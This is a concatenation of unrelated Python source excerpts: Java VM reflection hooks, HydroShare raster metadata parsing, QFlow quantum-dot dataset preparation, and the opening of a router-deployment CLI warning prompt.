#except Exception:
# jcls = loader.getclass("java/lang/reflect/InvocationTargetException")
# objref = Objectref(jcls, True)
# raise JException(objref)
return objref
#TODO: Test me!
def VMConstructor_getSignature(locals, loader, cls, method):
this = locals.get(0, "ref")
clazz = this.fields.get('clazz', "ref")
method_info = this.fields.get(u'method_info', "ref")
const = clazz.class_type.cls.constant_pool
descr = const[method_info.descriptor_index]
return make_String(descr, loader)
def vmfield_set_helper(locals, _type):
this = locals.get(0, "ref")
objectref = locals.get(1, "ref")
value = locals.get(2, _type)
clazz = this.fields.get('clazz', "ref")
if not objectref.jcls.__name__ == clazz.class_type.__name__:
pass #TODO: throw IllegalAccessException
name = this.fields.get('name', "ref")
string = unpack_string(name)
# check if private
f_info = find_field_info(clazz.class_type.cls, string)
is_private = f_info.access_flags & 0x2 == 0x2
# TODO: find calling class
try:
objectref.fields.set(string, value, _type)
except KeyError:
pass #TODO: throw IllegalAccessException
# TODO: IllegalAccessException, IllegalArgumentException
# NullPointerException, ExceptionInInitializerError
def vmfield_get_helper(locals, _type):
this = locals.get(0, "ref")
objectref = locals.get(1, "ref")
clazz = this.fields.get('clazz', "ref")
name = this.fields.get('name', "ref")
string = unpack_string(name)
if objectref==None:
try:
result = clazz.class_type.static_fields.get(string, _type)
except KeyError:
pass #TODO: exception if not static
return result
elif not objectref.jcls.__name__ == clazz.class_type.__name__:
pass #TODO: throw IllegalAccessException
try:
result = objectref.fields.get(string, _type)
except KeyError:
pass #TODO: throw IllegalAccessException
return result
def find_field_info(cls, name):
for i in range(cls.fields_count):
f = cls.fields[i]
fname = cls.constant_pool[f.name_index]
if fname==name:
return f
return None # not found
def check_primitive(name):
if name == "boolean":
return True
elif name == "byte":
return True
elif name == "short":
return True
elif name == "int":
return True
elif name == "char":
return True
elif name == "long":
return True
elif name == "float":
return True
elif name == "double":
return True
elif name == "void":
return True
return False
def check_interface(classref):
if classref.class_type.cls.access_flags == 0x0200 or classref.class_type.cls.access_flags == 0x0600:
return True
return False
HOOKS = {
("java/lang/reflect/VMConstructor","getSignature"):VMConstructor_getSignature,("java/lang/reflect/VMConstructor","construct"):VMConstructor_construct,
("java/lang/reflect/VMConstructor","getExceptionTypes"):VMConstructor_getExceptionTypes,
("java/lang/reflect/VMConstructor","getModifiersInternal"):VMConstructor_getModifiersInternal,
("java/lang/reflect/VMConstructor", "getParameterTypes"):VMConstructor_getParameterTypes,
("java/lang/reflect/VMMethod","invoke"):VMMethod_invoke,
("java/lang/reflect/VMMethod","getExceptionTypes"):VMMethod_getExceptionTypes,
("java/lang/reflect/VMMethod", "getReturnType"):VMMethod_getReturnType,
("java/lang/reflect/VMMethod", "getModifiersInternal"):VMMethod_getModifiersInternal,
("java/lang/reflect/VMMethod", "getParameterTypes"):VMMethod_getParameterTypes,
("java/lang/reflect/VMField", "getModifiersInternal"):VMField_getModifiersInternal,
("java/lang/reflect/VMField", "getType"):VMField_getType,
("java/lang/reflect/VMField", "setInt"):VMField_setInt,
("java/lang/reflect/VMField", "setByte"):VMField_setByte,
("java/lang/reflect/VMField", "setShort"):VMField_setShort,
("java/lang/reflect/VMField", "setLong"):VMField_setLong,
("java/lang/reflect/VMField", "setFloat"):VMField_setFloat,
("java/lang/reflect/VMField", "setDouble"):VMField_setDouble,
("java/lang/reflect/VMField", "setBoolean"):VMField_setBoolean,
("java/lang/reflect/VMField", "setChar"):VMField_setChar,
("java/lang/reflect/VMField", "set"):VMField_set,
("java/lang/reflect/VMField", "getInt"):VMField_getInt,
("java/lang/reflect/VMField", "getByte"):VMField_getByte,
("java/lang/reflect/VMField", "getShort"):VMField_getShort,
("java/lang/reflect/VMField", "getLong"):VMField_getLong,
("java/lang/reflect/VMField", "getFloat"):VMField_getFloat,
("java/lang/reflect/VMField", "getDouble"):VMField_getDouble,
("java/lang/reflect/VMField", "getBoolean"):VMField_getBoolean,
("java/lang/reflect/VMField", "getChar"):VMField_getChar,
("java/lang/reflect/VMField", "get"):VMField_get,
("java/lang/VMClass", "isInterface"):VMClass_isInterface,
("java/lang/VMClass", "getName"):VMClass_getName,
("java/lang/VMClass", "getSuperclass"):VMClass_getSuperclass,
("java/lang/VMClass", "getInterfaces"):VMClass_getInterfaces,
("java/lang/VMClass", "getDeclaredClasses"):VMClass_getDeclaredClasses,
("java/lang/VMClass", "getDeclaredFields"):VMClass_getDeclaredFields,
("java/lang/VMClass", "getDeclaredMethods"):VMClass_getDeclareMethods,
("java/lang/VMClass", "getDeclaredConstructors"):VMClass_getDeclaredConstructors,
("java/lang/VMClass", "getClassLoader"):VMClass_getClassLoader,
("java/lang/VMClass", "forName"):VMClass_forName,
("java/lang/VMClass", "isArray"):VMClass_isArray,
("java/lang/VMClass", "initialize"):VMClass_initialize,
("java/lang/VMClass", "loadArrayClass"):VMClass_loadArrayClass,
("java/lang/VMClass", "throwException"):VMClass_throwException,
("java/lang/VMClass", "isInstance"):VMClass_isInstance,
("java/lang/VMClass", "isAssignableFrom"):VMClass_isAssignableForm,
("java/lang/VMClass", "isPrimitive"):VMClass_isPrimitive,
("java/lang/VMClass", "getComponentType"):VMClass_getComponentType,
("java/lang/VMClass", "getModifiers"):VMClass_getModifiers,
("java/lang/VMClass", "getDeclaringClass"):VMClass_getDeclaringClass,
("java/lang/VMClass", "isSynthetic"):VMClass_isSynthetic,
("java/lang/VMClass", "isAnnotation"):VMClass_isAnnotation,
("java/lang/VMClass", "isEnum"):VMClass_isEnum,
#("java/lang/VMClass", "getSimpleName"):VMClass_getSimpleName,
("java/lang/VMClass", "getCanonicalName"):VMClass_getCanonicalName,
("java/lang/VMClass", "getEnclosingClass"):VMClass_getEnclosingClass,
("java/lang/VMClass", "getEnclosingConstructor"):VMClass_getEnclosingConstructor,
("java/lang/VMClass", "getEnclosingMethod"):VMClass_getEnclosingMethod,
("java/lang/VMClass", "getClassSignature"):VMClass_getClassSignature,
("java/lang/VMClass", "isAnonymousClass"):VMClass_isAnonymousClass,
("java/lang/VMClass", "isLocalClass"):VMClass_isLocalClass,
("java/lang/VMClass", "isMemberClass"):VMClass_isMemberClass,
("java/lang/VMObject","getClass"):VMObject_getClass,
("java/lang/VMObject","clone"):VMObject_clone,
("java/lang/VMObject","notify"):VMObject_notify,
("java/lang/VMObject","notifyAll"):VMObject_notifyAll,
("java/lang/VMObject","wait"):VMObject_wait,
("java/lang/VMClassLoader","defineClass"):VMClassLoader_defineClass,
("java/lang/VMClassLoader","resolveClass"):VMClassLoader_resolveClass,
("java/lang/VMClassLoader","loadClass"):VMClassLoader_loadClass,
("java/lang/VMClassLoader","getPrimitiveClass"):VMClassLoader_getPrimitiveClass,
#("java/lang/VMClassLoader","getResource"):VMClassLoader_getResource,
#("java/lang/VMClassLoader","getResources"):VMClassLoader_getResources,
("java/lang/VMClassLoader","getPackage"):VMClassLoader_getPackage,
("java/lang/VMClassLoader","getPackages"):VMClassLoader_getPackages,
#("java/lang/VMClassLoader","defaultAssertionStatus"):VMClassLoader_defaultAssertionStatus,
("java/lang/VMClassLoader","packageAssertionStatus"):VMClassLoader_packageAssertionStatus,
("java/lang/VMClassLoader","classAssertionStatus"):VMClassLoader_classAssertionStatus,
("java/lang/VMClassLoader","getSystemClassLoader"):VMClassLoader_getSystemClassLoader,
("java/lang/VMSystem","arraycopy"):VMSystem_arraycopy,
("java/lang/VMSystem","identityHashCode"):VMSystem_identityHashCode,
("java/lang/VMSystem","setIn"):VMSystem_setIn,
("java/lang/VMSystem","setOut"):VMSystem_setOut,
("java/lang/VMSystem","setErr"):VMSystem_setErr,
("java/lang/VMSystem","currentTimeMillis"):VMSystem_currentTimeMillis,
("java/lang/VMSystem","getenv"):VMSystem_getenv,
#("java/lang/VMSystem","makeStandardInputStream"):VMSystem_makeStandardInputStream,
#("java/lang/VMSystem","makeStandardOutputStream"):VMSystem_makeStandardOutputStream,
#("java/lang/VMSystem","makeStandardErrorStream"):VMSystem_makeStandardErrorStream,
| |
import xml.sax
import rdflib
from django.db import transaction
from hs_core.serialization import GenericResourceMeta
class RasterResourceMeta(GenericResourceMeta):
"""
Lightweight class for representing metadata of RasterResource instances.
"""
def __init__(self):
super(RasterResourceMeta, self).__init__()
self.cell_info = None
self.band_info = []
self.spatial_reference = None
def _read_resource_metadata(self):
super(RasterResourceMeta, self)._read_resource_metadata()
print("--- RasterResourceMeta ---")
# Also parse using SAX so that we can capture certain metadata elements
# in the same order in which they appear in the RDF+XML serialization.
SAX_parse_results = RasterResourceSAXHandler()
xml.sax.parse(self.rmeta_path, SAX_parse_results)
hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
# Get CellInformation
for s, p, o in self._rmeta_graph.triples((None, hsterms.CellInformation, None)):
self.cell_info = RasterResourceMeta.CellInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for CellInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.name = str(name_lit)
# Get rows
rows_lit = self._rmeta_graph.value(o, hsterms.rows)
if rows_lit is None:
msg = "Rows attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.rows = int(str(rows_lit))
# Get columns
columns_lit = self._rmeta_graph.value(o, hsterms.columns)
if columns_lit is None:
msg = "Columns attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.columns = int(str(columns_lit))
# Get cellSizeXValue
cellX_lit = self._rmeta_graph.value(o, hsterms.cellSizeXValue)
if cellX_lit is None:
msg = "cellSizeXValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeXValue = float(str(cellX_lit))
# Get cellSizeYValue
cellY_lit = self._rmeta_graph.value(o, hsterms.cellSizeYValue)
if cellY_lit is None:
msg = "cellSizeYValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeYValue = float(str(cellY_lit))
# Get cellDataType
celldt_lit = self._rmeta_graph.value(o, hsterms.cellDataType)
if celldt_lit is None:
msg = "cellDataType attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellDataType = str(celldt_lit)
# Get noDateValue
nodata_lit = self._rmeta_graph.value(o, hsterms.noDataValue)
if nodata_lit is not None:
self.cell_info.noDataValue = float(str(nodata_lit))
print("\t\t{0}".format(self.cell_info))
# Get BandInformation
if SAX_parse_results:
# Use band info from SAX parser
self.band_info = list(SAX_parse_results.band_info)
else:
# Get band info from RDF
for s, p, o in self._rmeta_graph.triples((None, hsterms.BandInformation, None)):
band_info = RasterResourceMeta.BandInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.name = str(name_lit)
# Get variableName
varname_lit = self._rmeta_graph.value(o, hsterms.variableName)
if varname_lit is None:
msg = "variableName for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableName = str(varname_lit)
# Get variableUnit
varunit_lit = self._rmeta_graph.value(o, hsterms.variableUnit)
if varunit_lit is None:
msg = "variableUnit for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableUnit = str(varunit_lit)
# Get method
method_lit = self._rmeta_graph.value(o, hsterms.method)
if method_lit is not None:
band_info.method = str(method_lit)
# Get comment
comment_lit = self._rmeta_graph.value(o, hsterms.comment)
if comment_lit is not None:
band_info.comment = str(comment_lit)
self.band_info.append(band_info)
for b in self.band_info:
print("\t\t{0}".format(str(b)))
# Get spatialReference
for s, p, o in self._rmeta_graph.triples((None, hsterms.spatialReference, None)):
spat_ref_lit = self._rmeta_graph.value(o, rdflib.namespace.RDF.value)
if spat_ref_lit is None:
msg = "Spatial reference value not found for {0}.".format(o)
raise GenericResourceMeta.ResourceMetaException(msg)
self.spatial_reference = RasterResourceMeta.SpatialReference(str(spat_ref_lit))
print("\t\t{0}".format(self.spatial_reference))
@transaction.atomic
def write_metadata_to_resource(self, resource):
"""
Write metadata to resource
:param resource: RasterResource instance
"""
super(RasterResourceMeta, self).write_metadata_to_resource(resource)
if self.cell_info:
resource.metadata.cellInformation.delete()
resource.metadata.create_element('CellInformation', name=self.cell_info.name,
rows=self.cell_info.rows,
columns=self.cell_info.columns,
cellSizeXValue=self.cell_info.cellSizeXValue,
cellSizeYValue=self.cell_info.cellSizeYValue,
cellDataType=self.cell_info.cellDataType,
noDataValue=self.cell_info.noDataValue)
if len(self.band_info) > 0:
for band in resource.metadata.bandInformation:
band.delete()
for b in self.band_info:
resource.metadata.create_element('BandInformation', name=b.name,
variableName=b.variableName,
variableUnit=b.variableUnit, method=b.method,
comment=b.comment)
if self.spatial_reference:
resource.metadata.originalCoverage.delete()
values = {'units': self.spatial_reference.units,
'northlimit': self.spatial_reference.northlimit,
'eastlimit': self.spatial_reference.eastlimit,
'southlimit': self.spatial_reference.southlimit,
'westlimit': self.spatial_reference.westlimit,
'projection': self.spatial_reference.projection}
kwargs = {'value': values}
resource.metadata.create_element('OriginalCoverage', **kwargs)
class CellInformation(object):
def __init__(self):
self.name = None
self.rows = None
self.columns = None
self.cellSizeXValue = None
self.cellSizeYValue = None
self.cellDataType = None
self.noDataValue = None # Optional
def __str__(self):
msg = "CellInformation name: {name}, "
msg += "rows: {rows}, columns: {columns}, "
msg += "cellSizeXValue: {cellSizeXValue}, cellSizeYValue: {cellSizeYValue}, "
msg += "cellDataType: {cellDataType}, noDataValue: {noDataValue}"
msg = msg.format(name=self.name, rows=self.rows,
columns=self.columns, cellSizeXValue=self.cellSizeXValue,
cellSizeYValue=self.cellSizeYValue, cellDataType=self.cellDataType,
noDataValue=self.noDataValue)
return msg
def __unicode__(self):
return unicode(str(self))
class BandInformation(object):
def __init__(self):
self.name = None
self.variableName = None
self.variableUnit = None
self.method = None # Optional
self.comment = None # Optional
def __str__(self):
msg = "BandInformation name: {name}, "
msg += "variableName: {variableName}, variableUnit: {variableUnit}, "
msg += "method: {method}, comment: {comment}"
msg = msg.format(name=self.name, variableName=self.variableName,
variableUnit=self.variableUnit, method=self.method,
comment=self.comment)
return msg
def __unicode__(self):
return unicode(str(self))
class SpatialReference(object):
def __init__(self):
self.northlimit = None
self.eastlimit = None
self.southlimit = None
self.westlimit = None
self.units = None
self.projection = None # Optional
def __str__(self):
msg = "SpatialReference northlimit: {northlimit}, "
msg += "eastlimit: {eastlimit}, southlimit: {southlimit}, "
msg += "westlimit: {westlimit}, units: {units}, projection: {projection}"
msg = msg.format(northlimit=self.northlimit, eastlimit=self.eastlimit,
southlimit=self.southlimit, westlimit=self.westlimit,
units=self.units, projection=self.projection)
return msg
def __unicode__(self):
return unicode(str(self))
def __init__(self, value_str):
kvp = value_str.split(';')
for pair in kvp:
(key, value) = pair.split('=')
key = key.strip()
value = value.strip()
if key == 'name':
self.name = value
elif key == 'eastlimit':
try:
self.eastlimit = float(value)
except Exception as e:
msg = "Unable to parse east limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'northlimit':
try:
self.northlimit = float(value)
except Exception as e:
msg = "Unable to parse north limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'southlimit':
try:
self.southlimit = float(value)
except Exception as e:
msg = "Unable to parse south limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'westlimit':
try:
self.westlimit = float(value)
except Exception as e:
msg = "Unable to parse west limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'units':
self.units = value
elif key == 'projection':
self.projection = value
class RasterResourceSAXHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
# Content
self.band_info = []
# State variables
self._get_bandinfo = False
self._get_bandinfo_details = False
self._get_bandinfo_name = False
self._bandinfo_name = None
self._get_bandinfo_var_name = False
self._bandinfo_var_name = None
self._get_bandinfo_var_unit = False
self._bandinfo_var_unit = None
self._get_bandinfo_method = False
self._bandinfo_method = None
self._get_bandinfo_comment = False
self._bandinfo_comment = None
def characters(self, content):
if self._get_bandinfo_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information name."
raise xml.sax.SAXException(msg)
self._bandinfo_name.append(content)
elif self._get_bandinfo_var_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable name."
raise xml.sax.SAXException(msg)
self._bandinfo_var_name.append(content)
elif self._get_bandinfo_var_unit:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable unit."
raise xml.sax.SAXException(msg)
self._bandinfo_var_unit.append(content)
elif self._get_bandinfo_method:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information method."
raise xml.sax.SAXException(msg)
self._bandinfo_method.append(content)
elif self._get_bandinfo_comment:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information comment."
raise xml.sax.SAXException(msg)
self._bandinfo_comment.append(content)
def startElement(self, name, attrs):
if name == 'hsterms:BandInformation':
if self._get_bandinfo:
raise xml.sax.SAXException("Error: nested hsterms:BandInformation elements.")
self._get_bandinfo = True
elif name == 'rdf:Description':
if self._get_bandinfo:
if self._get_bandinfo_details:
msg = "Error: nested rdf:Description elements " \
"within hsterms:BandInformation element."
raise xml.sax.SAXException(msg)
# Create new band info
self.band_info.append(RasterResourceMeta.BandInformation())
self._get_bandinfo_details = True
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if self._get_bandinfo_name:
raise xml.sax.SAXException("Error: nested hsterms:name elements "
"within hsterms:BandInformation.")
self._get_bandinfo_name = True
self._bandinfo_name = []
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if self._get_bandinfo_var_name:
raise xml.sax.SAXException("Error: nested hsterms:variableName elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_name = True
self._bandinfo_var_name = []
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if self._get_bandinfo_var_unit:
raise xml.sax.SAXException("Error: nested hsterms:variableUnit elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_unit = True
self._bandinfo_var_unit = []
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if self._get_bandinfo_method:
raise xml.sax.SAXException("Error: nested hsterms:method elements "
"within hsterms:BandInformation.")
self._get_bandinfo_method = True
self._bandinfo_method = []
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if self._get_bandinfo_comment:
raise xml.sax.SAXException("Error: nested hsterms:comment elements "
"within hsterms:BandInformation.")
self._get_bandinfo_comment = True
self._bandinfo_comment = []
def endElement(self, name):
if name == 'hsterms:BandInformation':
if not self._get_bandinfo:
msg = "Error: close hsterms:BandInformation tag without corresponding open tag."
raise xml.sax.SAXException(msg)
self._get_bandinfo = False
elif name == 'rdf:Description':
if self._get_bandinfo:
if not self._get_bandinfo_details:
msg = "Error: close rdf:Description tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self._get_bandinfo_details = False
elif name == | |
import numpy as np
import random
from scipy.stats import skew as scipy_skew
from skimage.transform import resize as skimage_resize
from QFlow import config
## set of functions for loading and preparing a dataset for training.
def get_num_min_class(labels):
'''
Get the number of the minimum represented class in label vector.
Used for resampling data.
input:
labels: np.ndarray of labels
outputs:
num_samples: int number of samples for minimum class
'''
# use argmax as example's class
argmax_labels = np.argmax(labels, axis=-1)
# max of num_samples is all one label
num_samples = labels.shape[0]
for i in range(labels.shape[-1]):
lab_elems = np.sum(argmax_labels==i)
if lab_elems < num_samples:
num_samples = lab_elems
return num_samples
def resample_data(features, state_labels, labels=None, seed=None):
'''
Resample data to be evenly distributed across classes in labels by cutting
number of examples for each class to be equal to the number of examples
in the least represented class. (classes assumed to be last axis of
labels). Shuffles after resampling.
inputs:
features: ndarray of features to be resampled. Resample along first axis.
state_labels: ndarray of labels to be used for resampling
labels: ndarray of labels to be resampled.
return_state: bool specifying whether to return state labels
seed: Seed of random number generator for shuffling idxs during resample
and for shuffling resampled features and labels.
outputs:
features: list of resampled features
labels: list of resampled labels
'''
rng = np.random.default_rng(seed)
num_samples = get_num_min_class(state_labels)
features_resamp = []; state_labels_resamp = []; labels_resamp = []
for i in range(state_labels.shape[-1]):
s_idxs = state_labels.argmax(axis=-1)==i
# first get full array of single state
features_s_full = features[s_idxs]
state_labels_s_full = state_labels[s_idxs]
if labels is not None:
labels_s_full = labels[s_idxs]
# then get idxs (0-length), shuffle, and slice to num_samples
# shuffle idxs to be sure labels and features are shuffled together
idxs = list(range(features_s_full.shape[0]))
rng.shuffle(idxs)
features_resamp.append(features_s_full[idxs[:num_samples]])
state_labels_resamp.append(state_labels_s_full[idxs[:num_samples]])
if labels is not None:
labels_resamp.append(labels_s_full[idxs[:num_samples]])
features_resamp_arr = np.concatenate(features_resamp, axis=0)
state_labels_resamp_arr = np.concatenate(state_labels_resamp, axis=0)
if labels is not None:
labels_resamp_arr = np.concatenate(labels_resamp, axis=0)
idxs = list(range(features_resamp_arr.shape[0]))
rng.shuffle(idxs)
if labels is not None:
return features_resamp_arr[idxs], labels_resamp_arr[idxs]
elif labels is None:
return features_resamp_arr[idxs], state_labels_resamp_arr[idxs]
def noise_mag_to_class(state_labels, noise_mags,
low_thresholds=None, high_thresholds=None):
'''
Function to convert noise magnitudes to noise classes.
Noise class thresholds are defined here. Thresholds for states
order is: no dot, left dot, central dot, right dot, double dot
Default low thresholds is the linear extrapolation to 100 % accuracy
of an average noisy-trained model vs. noise_mag. Default high
thresholds are from linear extrapolation to 0 % accuracy of an
average noisy trained model vs. noise_mag.
inputs:
state_labels: list of state labels. shape assumed to be
(num_examples, num_states).
noise_mags: list of float noise_mags for state_labels. shape assumed
to be (num_examples, ).
low_thresholds: list of floats of shape (num_state, ) specifying
high signal to noise class thresholds.
high_thresholds: list of floats of shape (num_state, ) specifying
high signal to noise class thresholds.
'''
# set number of noise classes and states.
# length of thresholds must be equal to num_states.
# no num_quality_classes != 3 are supported.
num_quality_classes = config.NUM_QUALITY_CLASSES
num_states = config.NUM_STATES
# set default thresholds
if high_thresholds is None:
high_thresholds = [1.22, 1.00, 1.21, 0.68, 2.00]
if low_thresholds is None:
low_thresholds = [0.31, 0.32, 0.41, 0.05, 0.47]
low_thresholds = np.array(low_thresholds)
high_thresholds = np.array(high_thresholds)
quality_classes = np.zeros(noise_mags.shape+(num_quality_classes,))
# use fractional labels by taking weighted average after
# applying thresholds
num_states = state_labels.shape[-1]
# get per state classes then sum across last axis later
per_state_classes = np.zeros(
noise_mags.shape + (num_quality_classes,) + (num_states,))
# use boolean indexing to define classes from noise mags/threshold arrays
for i in range(num_states):
per_state_classes[noise_mags <= low_thresholds[i],0, i] = 1
per_state_classes[(noise_mags > low_thresholds[i]) &\
(noise_mags <= high_thresholds[i]), 1, i] = 1
per_state_classes[noise_mags > high_thresholds[i], 2, i] = 1
# multiply each first axis element then sum across last axes
quality_classes = np.einsum('ijk,ik->ij', per_state_classes, state_labels)
return quality_classes
def get_data(f, train_test_split=0.9,
dat_key='sensor', label_key='state',
resample=True, seed=None,
low_thresholds=None, high_thresholds=None):
'''
Reads in the subregion data and converts it to a format useful for training
Note that the data is shuffled after reading in.
inputs:
f: one of:
str path to .npz file containing cropped data
dict of cropped data.
train_test_split: float fraction of data to use for training.
resample: bool specifying whether to resample data to get even state
representation.
seed: int random seed for file shuffling.
label_key: string key for data used for the label. One of:
'data_quality', 'noise_mag_factor', 'state'.
low_threshold: list of noise levels to use for high/moderate signal
to noise ratio threshold.
high_threshold: list of noise levels to use for moderate/low signal
to noise ratio threshold.
outputs:
train_data: np.ndarray of training data.
train_labels: np.ndarray of training labels.
eval_data: np.ndarray of training data.
eval_labels: np.ndarray of training labels.
'''
# treat f as path, or if TypeError treat as dict.
try:
dict_of_dicts = np.load(f, allow_pickle = True)
file_on_disk = True
except TypeError:
dict_of_dicts = f
file_on_disk = False
files = list(dict_of_dicts.keys())
random.Random(seed).shuffle(files)
inp = []
oup_state = []
# if we want a nonstate label load it so we can resample
if label_key!='state':
oup_labels = []
else:
oup_labels = None
train_labels = None
eval_labels = None
# if label is noise class, we need to get noise mag labels first
# then process to turn the mag into a class label
if label_key == 'data_quality':
data_quality = True
label_key = 'noise_mag_factor'
else:
data_quality = False
for file in files:
# for compressed data, file is the key of the dict of dicts
if file_on_disk:
data_dict = dict_of_dicts[file].item()
else:
data_dict = dict_of_dicts[file]
dat = data_dict[dat_key]
# generates a list of arrays
inp.append(dat.reshape(config.SUB_SIZE,config.SUB_SIZE,1))
oup_state.append(data_dict['state']) # generates a list of arrays
if oup_labels is not None:
oup_labels.append(data_dict[label_key])
inp = np.array(inp) # converts the list to np.array
oup_state = np.array(oup_state) # converts the list to np.array
if oup_labels is not None:
oup_labels = np.array(oup_labels)
# split data into train and evaluatoin data/labels
n_samples = inp.shape[0]
print("Total number of samples :", n_samples)
n_train = int(train_test_split * n_samples)
train_data = inp[:n_train]
print("Training data info:", train_data.shape)
train_states = oup_state[:n_train]
if oup_labels is not None:
train_labels = oup_labels[:n_train]
eval_data = inp[n_train:]
print("Evaluation data info:", eval_data.shape)
eval_states = oup_state[n_train:]
if oup_labels is not None:
eval_labels = oup_labels[n_train:]
# convert noise mag to class before resampling/getting noise mags if
# needed because resampling doesnt return state labels
if data_quality:
train_labels = noise_mag_to_class(
train_states, train_labels,
low_thresholds=low_thresholds,
high_thresholds=high_thresholds,
)
eval_labels = noise_mag_to_class(
eval_states, eval_labels,
low_thresholds=low_thresholds,
high_thresholds=high_thresholds,
)
# resample to make state representation even
if resample:
train_data, train_labels = resample_data(
train_data, train_states, train_labels)
eval_data, eval_labels = resample_data(
eval_data, eval_states, eval_labels)
elif not resample and label_key=='state':
train_labels = train_states
eval_labels = eval_states
# expand dim of labels to make sure that they have proper shape
if oup_labels is not None and len(train_labels.shape)==1:
np.expand_dims(train_labels, 1)
if oup_labels is not None and len(eval_labels.shape)==1:
np.expand_dims(eval_labels, 1)
return train_data, train_labels, eval_data, eval_labels
## preprocess functions
def gradient(x):
'''
Take gradient of an ndarray in specified direction. Thin wrapper around
np.gradient(). Also note that x -> axis=1 and y-> axis=0
input:
x: An numpy ndarray to take the gradient of
output:
numpy ndarray containing gradient in x direction.
'''
return np.gradient(x, axis=1)
def apply_threshold(x, threshold_val=10, threshold_to=0):
'''
Thresholds an numpy ndarray to remove
Args:
x = numpy array with data to be filtered
threshold_val = percentile below which to set values to zero
'''
x[x < np.abs(np.percentile(x.flatten(),threshold_val))] = threshold_to
return x
def apply_clipping(x, clip_val=3, clip_to='clip_val'):
'''
Clip input symmetrically at clip_val number of std devs.
Do not zscore norm x, but apply thresholds using normed x
'''
x_clipped = np.copy(x)
mean = np.mean(x)
std = np.std(x)
norm_x = (x - mean) / std
# set clipped values to either the mean or clip threshold
if clip_to.lower() == 'clip_val':
x_clipped[norm_x < -clip_val] = -clip_val * std + mean
x_clipped[norm_x > clip_val] = clip_val * std + mean
elif clip_to.lower() == 'mean':
x_clipped[norm_x < -clip_val] = mean
x_clipped[norm_x > clip_val] = mean
else:
| |
# stdlib
import json
import re
import traceback
from typing import Any, Dict, Optional
# libs
import netaddr
# local
from bin import RouterMixin, utils
import settings
ADDRESS_NAME_SUB_PATTERN = re.compile(r'[\.\/:]')
class RouterScrub(RouterMixin):
def run(self):
self.run_router()
def prompt(self):
print()
utils.colour_print('(colour_cmd)\u250D' + ('\u2501' * 30) + '\u2511')
utils.colour_print('\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 12) + '(colour_warning)WARNING(colour_cmd)' + (' ' * 11) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)Deploying a router deletes'
'(colour_cmd)' + (' ' * 2) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)all of the configuration'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 8) + '(colour_clear)on that device'
'(colour_cmd)' + (' ' * 8) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 6) + '(colour_clear)Deploying a router'
'(colour_cmd)' + (' ' * 6) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)ALREADY in production'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)will cause service outages.'
'(colour_cmd)' + ' ' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)Make sure you have read'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 4) + '(colour_clear)the "help" and updated'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)settings file correctly.'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Y or y '
'(colour_clear)to continue.(colour_cmd)' + '\u2502')
utils.colour_print(
